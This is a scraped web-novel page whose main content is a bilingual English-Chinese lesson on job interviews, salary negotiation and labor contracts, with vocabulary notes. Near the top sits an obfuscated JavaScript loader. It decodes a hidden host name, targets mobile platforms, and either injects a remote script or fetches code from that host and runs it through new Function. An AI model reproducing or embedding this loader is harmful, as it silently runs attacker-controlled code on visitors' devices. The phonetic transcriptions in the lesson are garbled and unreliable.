妙书阁小说

阅读记录  |   用户书架
上一页
目录 | 设置
下一章
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};

01 猎取工作不容易(2 / 2)

加入书签 | 推荐本书 | 问题反馈 |

jim: i expect to be paid according to my capacity.

吉姆:我希望按照我的工作能力付薪水。

interviewer: how do you think 3000 yuan a month?

面试官:一个月3000元怎样?

jim: hmm…thank you for your offer. but that would be a little less than i have expected. i think the salary should start at 4000 yuan per month.

吉姆:嗯,感谢您提供3000元的薪水。但是这比我预期的略低了些,我的预期薪水是起薪4000元。

interviewer: how do you think you worth it?

面试官:你怎么觉得自己能拿到那么高的薪水?

jim: i have rich experience in a transnational enterprise, and i was given recognition for doing well. therefore, i think i worth the salary.

吉姆:我有在跨国公司工作的丰富经验,而且我的表现也得到了认可。因此我认为我有能力拿到那么多。

interviewer: ok, then what about an annual salary of 50 000 yuan plus bonus?

面试官:好的。年薪5万外加奖金怎么样?

jim: thank you, i am satisfied with it. could you tell me something about benefits and vacations?

吉姆:谢谢,我很满意。您能告诉我福利和假期是怎样的吗?

interviewer: we will provide you with medical insurance, endowment insurance and the housing fund after 3 months&#039; probation.

面试官:3个月试用期过后我们提供医疗保险、养老保险和住房公积金。

jim: what about vacations?

吉姆:假期呢?

interviewer: you&#039;ll enjoy a two-week paid vacation a year after you&#039;ve been here more than a year. we also have weekends and legal holidays. and there will be a certain increase in salary every year if you work hard. any questions?

面试官:工作满一年后你将享有两周的带薪休假。我们还有周末和法定节假日。如果你工作努力,工资会在每年有一定程度的增长。还有什么问题吗?

jim: no, thank you.

吉姆:没有了,谢谢。

notes

1. according to 据……所说;根据,按照

2. transnational enterprise 跨国企业

3. recognition [?rek?g&#039;ni??n] n. 识别;认可;赏识,表彰

4. bonus [&#039;b?un?s] n. 奖金,红利;额外给予的东西

5. housing fund 住房公积金

6. probation [pr?&#039;bei??n] n. 缓刑(期);(以观后效的)察看;试用(期)

7. legal [&#039;li:g?l] adj. 法律(上)的;合法的,法定的

小贴士

1. what salary would you expect to get?

你希望拿多少薪水?

2. the starting salary is 3000 yuan every month for the first year and you will get a raise every year.

第一年每个月是3000元,以后每年都会涨一些。

3. i am willing to work on trial for 3 months in low salary.

我不介意低薪试用3个月。

4. i&#039;d like to formally accept your offer.

我很乐意接受这份工作。

5. could i ask about the vacations and sick leave?

我能问一下假期和病假的情况吗?

6. you&#039;ll get bonuses at the end of every year.

每年年底你会得到年终奖金。

7. if your work is remarkable, you can ask for a pay raise.

如果你工作很出色的话,你可以要求加薪。

忐忑不安问结果

dialogue

three days passed, but david still hasn&#039;t got any result about his interview. so he decides to make a call to the personnel department.

戴维面试已经过去3天了,他仍然没有得到任何结果。戴维决定打电话到人事部了解一下。

david: hello, could i speak to mr. blakely?

戴维:你好,我能和布莱克利先生讲话吗?

a: wait a moment, please.

a:请稍等。

mr. blakely: this is karl blakely speaking. who is that?

布莱克利先生:我是卡尔·布莱克利。哪位?

david: hello, mr. blakely. this is david strong. you gave me an interview three days ago.

戴维:你好,布莱克利先生。我是戴维·斯特朗。您3天前面试过我。

mr. blakely: yes, mr. strong. can i help you?

布莱克利先生:是的,斯特朗先生。我能帮你什么吗?

david: i&#039;m just calling to inquire the outcome of the interview. have you made any decision about the position of the sales assistant?

戴维:我打电话是想了解一下面试结果。请问销售助理这一职位定下来了没有?

mr. blakely: thank you for your concern about our recruitment. but we haven&#039;t made any decision yet as we need time to choose the perfect person. we will notify you by phone if there is any result.

布莱克利先生:谢谢你对我们招聘工作的关心。但是我们目前还没有做出决定,因为我们需要时间挑选出最佳人选。如果有结果我们会打电话通知您的。

david: is it possible for me to know when the decision will be made?

戴维:您能告诉我什么时候出结果吗?

mr. blakely: maybe next monday.

布莱克利先生:可能在下周一。

david: all right. thank you.

戴维:好的,谢谢。

mr. blakely: you are welcome.

布莱克利先生:不客气。

notes

1. interview [&#039;int?vju:] n. 接见,会见;面试;v. 面试;采访

2. outcome [&#039;autk?m] n. 结果;结局;产量

3. recruitment [ri&#039;kru:tm?nt] n. 招募;征募新兵;补充

4. notify [&#039;n?utifai] v. 通知,告知;报告

小贴士

1. when can i know whether i am accepted or not?

我什么时候能知道我是否被录用了?

2. i&#039;m just calling to follow up about the market manager.

我打电话是想问一下市场经理的招聘结果。

3. thank you for giving me this chance. i won&#039;t let you down.

感谢您给我这次机会,我不会让您失望的。

4. i&#039;m very glad to be employed by your firm.

我很高兴能被你们公司录用。

5. we&#039;ll call you if you are hired.

如果你被录用了,我们会电话通知你的。

6. i am sorry to tell you that you are refused. maybe you are suitable for another better job.

很遗憾你没有被录用,也许你适合其他更好的工作。

7. could you let me know why you didn&#039;t hire me?

能告诉我不雇用我的原因吗?

签订协议是保障

dialogue

jim passed the interview of a network firm. now a clerk of the personnel department is inquiring him whether he will take the job and sign the labor contract.

吉姆通过了一家网络公司的面试。人事部工作人员正在询问他是否接受这份工作并签订劳动合同。

jim: excuse me, is this the personnel department?

吉姆:你好,请问这是人事部吗?

mr. gates: yes. what can i do for you?

盖茨先生:是的。我能帮您做点什么呢?

jim: i am jim strong. the personnel manager called me to talk about the labor contract.

吉姆:我是吉姆·斯特朗。人事部经理给我打电话让我来谈一下劳动合同的事。

mr. gates: have a seat, please. i know our personnel manager has already given you information about the contract, but it&#039;s necessary to go over the main details again before signing. first, you&#039;ll get a monthly salary and enjoy a two-week paid vacation every year after one year&#039;s service. what i should stress is that the probation is 3 months. and during this time you will be paid 2000 yuan a month.

盖茨先生:请坐。我知道经理已经给你说了劳动合同的内容,但是在签合同之前再谈一些主要细节是很必要的。首先,你的工资是按月发放,工作满一年后每年将享有两周的带薪休假。需要强调的是试用期是3个月,试用期工资是每月2000元。

jim: i know that.

吉姆:这我清楚。

mr. gates: we will provide you with medical plan, endowment insurance, unemployment insurance and the housing fund while on duty. if you put in extra hours,you can receive overtime pay. have you read the other terms of the contract?

盖茨先生:你上班后我们给你提供医疗保险、养老保险、失业保险和住房公积金。如果你加班了会有加班费。你已经看了合同的其他条款了吗?

jim: yes, i have. but i have a question. what if i need to ask for leave more than the given time?

吉姆:是的,已经看了。但是我有一个问题,如果要超过规定的时间请假该怎么办?

mr. gates: you need to be approved by the general manager.

盖茨先生:你需要得到总经理的批准。

jim: ok, i see. thank you.

吉姆:好的,我知道了。谢谢。

mr. gates: that&#039;s all right. please sign here if you have no questions, and then you can start work next monday.

盖茨先生:不客气。如果你没有其他问题的话,请在这儿签字,下周一你就可以开始工作了。

notes

1. personnel department 人事部门

2. go over 仔细检查;复习;重做

3. overtime [&#039;?uv?taim] n. 超出的时间;加班

4. ask for leave 请假

小贴士

1. we need to take you on three months&#039; probation first, and then we can sign a contract with legal force.

我们要先试用你3个月,然后签订一份具有法律效力的合同。

2. may i see the agreement first?

能先让我看下这份协议吗?

3. when do we sign the agreement if i take the position?

如果我接受了这份工作,我们什么时候签协议?

4. i want to know if the contract is legally valid.

我想知道这份合同有法律效力吗?

5. i have no more questions about this contract.

对于这份合同我没有其他问题了。

6. we are done with the labor contract.

这份劳动合同就这么定了。

7. i am very glad to work with you.

很高兴与你共事。

上一页
目录
下一章
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间